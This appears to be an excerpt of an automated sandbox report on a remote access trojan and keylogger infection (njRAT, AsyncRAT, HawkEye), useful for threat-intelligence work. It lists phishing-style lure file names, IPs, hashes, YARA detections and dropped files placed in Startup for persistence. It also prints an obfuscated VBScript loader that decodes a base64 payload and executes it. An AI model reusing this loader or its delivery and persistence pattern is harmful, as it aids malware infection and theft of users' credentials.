	Payment Advice GLV225445686.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	nzGUqSK11D.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	B6LNCKjOGt5EmFQ.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	BANK-STATMENT _xlsx.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	INQUIRY.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	c9o0CtTIYT.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	6JLHKYvboo.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	khJdbt0clZ.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	ZMOKwXqVHO.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	5Av43Q5IXd.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	8oaZfXDstn.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	9vdouqRTh3.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	M9RhKQ1G91.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	0CyK3Y7XBs.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	pwYhlZGMa6.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	Vll6ZcOkEQ.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	oLHQIQAI3N.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	YrHUxpftPs.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	WuGzF7ZJ7P.exe	Get hash	malicious	Browse	whatismyipaddress.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
whatismyipaddress.com	HID Purchase LedgerAdvice - 2001330.jar	Get hash	malicious	Browse	66.171.248.178
	HID Purchase LedgerAdvice - 2001330.jar	Get hash	malicious	Browse	66.171.248.178
	X5zr4r9Dbf.jar	Get hash	malicious	Browse	66.171.248.178
	4IttFJZwMj.jar	Get hash	malicious	Browse	66.171.248.178
	C8XAVCtsW4.jar	Get hash	malicious	Browse	66.171.248.178
	u2qcULTj3T.jar	Get hash	malicious	Browse	66.171.248.178
	u2qcULTj3T.jar	Get hash	malicious	Browse	66.171.248.178
	Gzw4s0btmW.jar	Get hash	malicious	Browse	66.171.248.178
	2NijKfXlSp.jar	Get hash	malicious	Browse	66.171.248.178
	Gzw4s0btmW.jar	Get hash	malicious	Browse	66.171.248.178
	RemittanceAdvice271-20210410-19143_212-50-20210410-203126128.jar	Get hash	malicious	Browse	66.171.248.178
	RemittanceAdvice271-20210410-19143_212-50-20210410-203126128.jar	Get hash	malicious	Browse	66.171.248.178
	Cg8OqFNi9n.jar	Get hash	malicious	Browse	66.171.248.178
	Cg8OqFNi9n.jar	Get hash	malicious	Browse	66.171.248.178
	UJu0Qiol0P.jar	Get hash	malicious	Browse	66.171.248.178
	UJu0Qiol0P.jar	Get hash	malicious	Browse	66.171.248.178
	B5nWfQK0n6.jar	Get hash	malicious	Browse	66.171.248.178
	2dyOkBlRGM.jar	Get hash	malicious	Browse	66.171.248.178
	czXGMilScJ.jar	Get hash	malicious	Browse	66.171.248.178
	B5nWfQK0n6.jar	Get hash	malicious	Browse	66.171.248.178

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
EXABYTES-AS-APExaBytesNetworkSdnBhdMY	PUR-21601146 SOP-21001146_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	SOA.exe	Get hash	malicious	Browse	103.6.198.37
	PUR-21601146 SOP-21001146_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	PUMP RFQ.exe	Get hash	malicious	Browse	103.6.198.237
	#10020213.exe	Get hash	malicious	Browse	103.6.198.237
	Enquiry 042021 Golden M_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	confirm below invoice.exe	Get hash	malicious	Browse	103.6.198.37
	Enquiry 042021 Emine INCE_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	#10001210.exe	Get hash	malicious	Browse	103.6.198.237
	TRANSACTION_INTTRANSFER_1617266945242_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	TRANSACTION_INTTRANSFER_1617266945242_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	TRANSACTION_INTTRANSFER_1617266945242_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	RQF 100021790.exe	Get hash	malicious	Browse	103.6.198.237
	IK8QsX6z2B1lPY0.exe	Get hash	malicious	Browse	137.59.110.57
	efaxHanglung_302.htm	Get hash	malicious	Browse	103.6.198.35
	RFQ - HASTALLOY MATERIAL.exe	Get hash	malicious	Browse	103.6.198.237
	#1002021.exe	Get hash	malicious	Browse	103.6.198.237
	PO AA21C04U3101-MTXGA6_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	#100028153.exe	Get hash	malicious	Browse	103.6.198.237
	#ENQ67548820.exe	Get hash	malicious	Browse	103.6.198.237
CLOUDFLARENETUS	Mga2NdfMyb.exe	Get hash	malicious	Browse	104.17.63.50
	EtnlEBRJwT.exe	Get hash	malicious	Browse	104.17.63.50
	T4QllcPRsl.exe	Get hash	malicious	Browse	104.21.6.252
	Telex_Copy.html	Get hash	malicious	Browse	104.16.18.94
	b304a312_by_Libranalysis.exe	Get hash	malicious	Browse	104.26.12.31
	Ha11NppGrb.exe	Get hash	malicious	Browse	104.21.85.176
	Wh00Ny9HXk.exe	Get hash	malicious	Browse	172.67.188.154
	ZRpmP5qEC1.exe	Get hash	malicious	Browse	172.67.188.154
	NIxm9vbD6u.exe	Get hash	malicious	Browse	104.17.62.50
	Setup.exe	Get hash	malicious	Browse	104.23.98.190
	4G842SDA.exe	Get hash	malicious	Browse	172.67.188.154
	Bestellen.exe	Get hash	malicious	Browse	172.67.208.174
	PR#270473.exe	Get hash	malicious	Browse	104.16.13.194
	VM_04_28_22.HTM	Get hash	malicious	Browse	104.18.11.207
	SkKcQaHEB8.exe	Get hash	malicious	Browse	162.159.130.233
	Halkbank_Ekstre_20210426_080203_744632.pdf.exe	Get hash	malicious	Browse	172.67.188.154
	Aeon Viet Nam Co.,Ltd.doc	Get hash	malicious	Browse	172.67.188.154
	shipment # 46-2021.jpg.exe	Get hash	malicious	Browse	172.67.200.16
	Bank Remittance Copy0572001. PDF.exe	Get hash	malicious	Browse	172.67.188.154
	RFQ for MR 29483 for Affordable Villa.doc	Get hash	malicious	Browse	104.21.19.200

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	diagram-1145261761.xlsm	Get hash	malicious	Browse	207.241.227.114
	Mga2NdfMyb.exe	Get hash	malicious	Browse	207.241.227.114
	EtnlEBRJwT.exe	Get hash	malicious	Browse	207.241.227.114
	diagram-397813623.xlsm	Get hash	malicious	Browse	207.241.227.114
	Telex_Copy.html	Get hash	malicious	Browse	207.241.227.114
	diagram-1304161436.xlsm	Get hash	malicious	Browse	207.241.227.114
	diagram-427473723.xlsm	Get hash	malicious	Browse	207.241.227.114
	wendy.klawon@coldwellbanker.com.htm	Get hash	malicious	Browse	207.241.227.114
	NIxm9vbD6u.exe	Get hash	malicious	Browse	207.241.227.114
	diagram-975956356.xlsm	Get hash	malicious	Browse	207.241.227.114
	statistic-2115301159.xlsm	Get hash	malicious	Browse	207.241.227.114
	statistic-2009856670.xlsm	Get hash	malicious	Browse	207.241.227.114
	payload.exe	Get hash	malicious	Browse	207.241.227.114
	statistic-1693833818.xlsm	Get hash	malicious	Browse	207.241.227.114
	Enrollment_Benefits-2022.docx	Get hash	malicious	Browse	207.241.227.114
	.htm	Get hash	malicious	Browse	207.241.227.114
	#Ud83d#Udcde Maerskdrilling.com AudioMessage_10-86588.htm	Get hash	malicious	Browse	207.241.227.114
	P20200107.DOC	Get hash	malicious	Browse	207.241.227.114
	sean.adair@redwirespace.com1__redwirespace.com.htm	Get hash	malicious	Browse	207.241.227.114
	statistic-1014587430.xlsm	Get hash	malicious	Browse	207.241.227.114

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	12_pgr.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\pgr.exe	12_pgr.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Tmp.exe	11_tmp.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe
File Type:	Microsoft Cabinet archive data, 58596 bytes, 1 file
Category:	dropped
Size (bytes):	58596
Entropy (8bit):	7.995478615012125
Encrypted:	true
SSDEEP:	1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
MD5:	61A03D15CF62612F50B74867090DBE79
SHA1:	15228F34067B4B107E917BEBAF17CC7C3C1280A8
SHA-256:	F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
SHA-512:	5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
Malicious:	false
Preview:	MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............\|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>..V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..\|0.+?.`-../.xvy..e......w.+^...w\|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g\|.z..+.D8.m..F .h............ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe
File Type:	data
Category:	modified
Size (bytes):	326
Entropy (8bit):	3.1146655678160102
Encrypted:	false
SSDEEP:	6:kKJkElMwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:BkElMwTJrkPlE99SNxAhUe0ht
MD5:	2385F10651B284807BD523A237CC041B
SHA1:	3713F39B2654862821D05824635F768679E55A1E
SHA-256:	17AAB987AABBEE866449DB169387D68BEF9976D9EC34A9F0300832A3FA71DFA5
SHA-512:	F4991D8A9DE584EE4B1E7461499306524DDD814737D728E5C04A86C21A0867490C4E8B312D072BD35928138055380D4FFDDD9428B5C8CDEBB8C357F83EE5EEEC
Malicious:	false
Preview:	p...... ........ .I.<..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\Tmp.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\Tmp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.278948378331044
Encrypted:	false
SSDEEP:	12:Q3LaJcP0kaHYGLi1B0/9UkB9t01kKVdisk7v:MLfaYgi6pB4QF
MD5:	D9626CB08EED6533EC63687FCD734977
SHA1:	E5FEB91EF568D36AD382D9566E2491DB1C90752E
SHA-256:	C86F4B0BA418353A162E3EA9872BB66F0CF453710CBA93D8E3F27234E8B284F3
SHA-512:	AAA37940B006C31398F5526957C3CFF9AAA3E72ED6B8326CA20AC2F523954CD8DCB03F5125A3B7DA1C060DE77D79CBEADD86A5483ED027508C4B177A0BB5D8AB
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualBas#\76002c3c0a2b9f0c8687ad35e8d9d309\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\d4c6a6df7bab3dad31763de990c4ed82.exe.log Download File
Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	641
Entropy (8bit):	5.279076743766229
Encrypted:	false
SSDEEP:	12:Q3LaJcP0kaHYGLi1B0/9UkB9t01kKVdisk70z6+xaiv:MLfaYgi6pB4Q+r
MD5:	16AC5AEE0452F1A942D29BEDB3E8DE11
SHA1:	3D92E71A2595E14ED8899335B2DE9323BAA85A67
SHA-256:	76F1FC9BA058F4F094A01D5F345B434070B7E35C9CFD4C20617FD9E6EC230CCE
SHA-512:	B1BBBFD16407DC63721EA2F763F4143DF3D0C11698AC0A1BC787502B38AF5A026575D913990CA50B67340F6CB4322E22AC907632457AC43A3C1C42CF2E1DDAA2
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualBas#\76002c3c0a2b9f0c8687ad35e8d9d309\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\e681e359556f0991834c31646ebd5526\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\codigo[1].txt Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	730
Entropy (8bit):	5.326599429048621
Encrypted:	false
SSDEEP:	12:qzgg3Zl1jnjXuxdDLBtO23FbvsHbtQn2cGbl9ZDu9eFYCvgUnt9YE:qzgg35jnjMe21rwO2zFu9bClwE
MD5:	7D6452CD01754786FF61188733C7E4D4
SHA1:	893DDBA0E2B3E478750E349DB75BFCAB10D71361
SHA-256:	C79CA848CAAFD9525FA6505C1EC7C6AE2AAF3ABAD4DCF73FC988DD769511B58A
SHA-512:	E446959A9A4C66F7F4182ADEBBAAA79D2EA5D57D36608142404632C8B123715DD263820A6D749020DADE425C600608336BA92CC7D5C8C012542E645C0325E046
Malicious:	false
IE Cache URL:	https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt
Preview:	dim ARrN ..ARrN= (" +++++ ")....dim WOUP ..WOUP= (" /456/").... UnSN = replace(UnSN, (ARrN), "A" ).. UnSN = replace(UnSN, (WOUP), "m" )....UnSN = StrReverse(UnSN) ..UnSN = OyDP(UnSN) ....Function OyDP(WJOv)....dim GUHT,UKsz..Set GUHT = CreateObject("Msxml2.DOMDocument.3.0")..Set UKsz = GUHT.CreateElement("base64")..UKsz.dataType = ("bin.base64") ..UKsz.text = WJOv ..OyDP = HLWn(UKsz.nodeTypedValue)..Set UKsz = Nothing ..Set GUHT = Nothing ..End Function....Function HLWn(PNYC)....dim JuBs ..Set JuBs = CreateObject("ADODB.Stream") ..JuBs.Type = 1 ..JuBs.Open ..JuBs.Write (PNYC) ..JuBs.Position = 0 ..JuBs.Type = 2 ..JuBs.CharSet = ("UTF-8") ..HLWn = JuBs.ReadText ..Set JuBs = Nothing ..End Function....execute UnSN

C:\Users\user\AppData\Local\Temp\Tmp.exe Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.550691485739008
Encrypted:	false
SSDEEP:	768:Xq47KHbq7NIowMZVHC8kUYUsFWn4UVm7JsWYKcOvt9t9cFKpBBDZ0DauldK:Ubq7JrDCR3UP4UVkRYw/tekpBBWdK
MD5:	9B30598F8F05C46F8ABB22A4C2ABCC9E
SHA1:	73665A73C48C889AF51EC9C99D8432218676B0CD
SHA-256:	2E5075A95C5663256555E292409149B4522F76FBE63BB48665213006C2D5CA2A
SHA-512:	35B2D08550387CAFED531B6EE3BA81CF1567E0E6934263044896060E39C6A865A8176A9817E259DD0527FC021E2DC9C9845649125EDF5CBFF1FB198AF3175360
Malicious:	true
Yara Hits:	Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Brian Wallace @botnet_hunter
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 78%, Browse Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: 11_tmp.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N..`............................N&... ........@.. ....................................@..................................%..W....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H...........i......Y...$...............................................&.(..........(........s.........s.........s.........s.........s..............0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+..*.0.................,.........o....-..+.......9....~..............,3~.........(....o........,.r...p......(....s....z.+..s..........~.........(.....o......(...+..}.ru....%-.&.+.%.(.....o....

C:\Users\user\AppData\Local\Temp\holderwb.txt Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Local\Temp\pgr.exe Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.525319833157279
Encrypted:	false
SSDEEP:	384:o8aZYC9twBNdcvFaly2H0dbJo6HghcASEJqc/ZmRvR6JZlbw8hqIusZzZU4:uY+sNKqNHnSdRpcnuq
MD5:	A08F2FAC257ABBBDDDBBD4439F32CFD0
SHA1:	26D3ED4771B701A82F6AA32B747E27BB26E9864C
SHA-256:	BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833
SHA-512:	3BEAD648A1AD82BD4E5599A55AE573B4CE6DC24EBDC3F0DAEC2C0A327CA1BF5E45A254E4F2480CEE0FEC0A4F83B15863679A63F7DCC0CE37D8F50E644BEFEF40
Malicious:	true
Yara Hits:	Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: JPCERT/CC Incident Response Group
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 91%, Browse Antivirus: ReversingLabs, Detection: 91%
Joe Sandbox View:	Filename: 12_pgr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..`.................V...........t... ........@.. ....................................@.................................4t..W.......@............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...@............X..............@..@.reloc...............\..............@..B................pt......H.......,K...)....../....................................................0..........r...p.....r...p...........r%..p.....r;..p.....rE..p.....r...p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....o....s.........s.....................r...p...........s......... ..............r+..p..............0..;.......~....o....o....r-..p~....(.....o.....o......%(.....(...............,,.......0..D.......~....o....o....r-..p~....(....o......(....o.....

C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\pgr.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	48640
Entropy (8bit):	5.556493970256603
Encrypted:	false
SSDEEP:	768:yuwCfTg46YbWUn8jjmo2qr/Is2z9lvPIHxFxpBpRNr0bHwYcrhgaxRA79sPsXbrn:yuwCfTgp/2xKHb/gbHwYcFgt799XbrLL
MD5:	6107D33B54A998C142311E55B3EC53D2
SHA1:	1C0B31C186FD413DC74E736A8BDEFBF4D0725EEC
SHA-256:	01A31C21F7C70363B4A5CA56BECD789D96646A1F0FD5F755E77EB8E26AE95D6A
SHA-512:	2487F434B5100541081D6B9259E617B646FE67220215D983A469E029AC87630A5492C003A642767F340C6E4580CDC203A91F153CA688BD6EAC1514EEBE0FEE75
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..^............................N.... ........@.. ....................... ............@.....................................S.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H........Y...u.............................................................V..;...$0.xC.=VD..b......9A../.\.....(.....~............~............~............~............~............~............~............~.....~............~............~............(>......2~.....o?....s..........()...:(...(...:....(+...:....('...:....((...9.....(v...V(....s.... ...o....n~....9....~....o..........~~....(....9....(0...9....(@...Vr^%.p~....(o....#....s...

C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\pgr.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	532992
Entropy (8bit):	6.506949900240727
Encrypted:	false
SSDEEP:	6144:juJEqxmd0bS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnxp:Td0QtqB5urTIoYWBQk1E+VF9mOx9si
MD5:	5C0E9E0C72288F8B70BB68C0036ECB52
SHA1:	920C9ECF8EBD35A8D0FF53A67A9C5DB2F1C35F59
SHA-256:	249026BE43AFFBDC61BE8DD1AAE8602668BA6BEE72E43D4760B2ACC7AB1526D4
SHA-512:	F7A508AA110DB5BF1BD0E6B867D777525B0C17719A54B3E881CE7E8BD544152BF1E0BEC12509028A302559CF987A3956D2409364F601F015559D67437CF8FB0D
Malicious:	true
Yara Hits:	Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Kevin Breen <kevin@techanarchy.net> Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Arnim Rupp Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: JPCERT/CC Incident Response Group
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.....................4........... ........@.. ....................................@.................................d...W.... ...2...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....2... ...2..................@..@.reloc.......`....... ..............@..B........................H.......0}..4..............X...........................................2s..............0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(............................0.. .........(....(..........(.....o..........................(......(.......o.......o.......o.......o.......R..(....o....o......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\pgr.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.525319833157279
Encrypted:	false
SSDEEP:	384:o8aZYC9twBNdcvFaly2H0dbJo6HghcASEJqc/ZmRvR6JZlbw8hqIusZzZU4:uY+sNKqNHnSdRpcnuq
MD5:	A08F2FAC257ABBBDDDBBD4439F32CFD0
SHA1:	26D3ED4771B701A82F6AA32B747E27BB26E9864C
SHA-256:	BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833
SHA-512:	3BEAD648A1AD82BD4E5599A55AE573B4CE6DC24EBDC3F0DAEC2C0A327CA1BF5E45A254E4F2480CEE0FEC0A4F83B15863679A63F7DCC0CE37D8F50E644BEFEF40
Malicious:	true
Yara Hits:	Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, Author: JPCERT/CC Incident Response Group
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 91%, Browse Antivirus: ReversingLabs, Detection: 91%
Joe Sandbox View:	Filename: 12_pgr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..`.................V...........t... ........@.. ....................................@.................................4t..W.......@............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...@............X..............@..@.reloc...............\..............@..B................pt......H.......,K...)....../....................................................0..........r...p.....r...p...........r%..p.....r;..p.....rE..p.....r...p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....o....s.........s.....................r...p...........s......... ..............r+..p..............0..;.......~....o....o....r-..p~....(.....o.....o......%(.....(...............,,.......0..D.......~....o....o....r-..p~....(....o......(....o.....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Download File
Process:	C:\Users\user\AppData\Roaming\servieda.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	6963200
Entropy (8bit):	5.550691485739008
Encrypted:	false
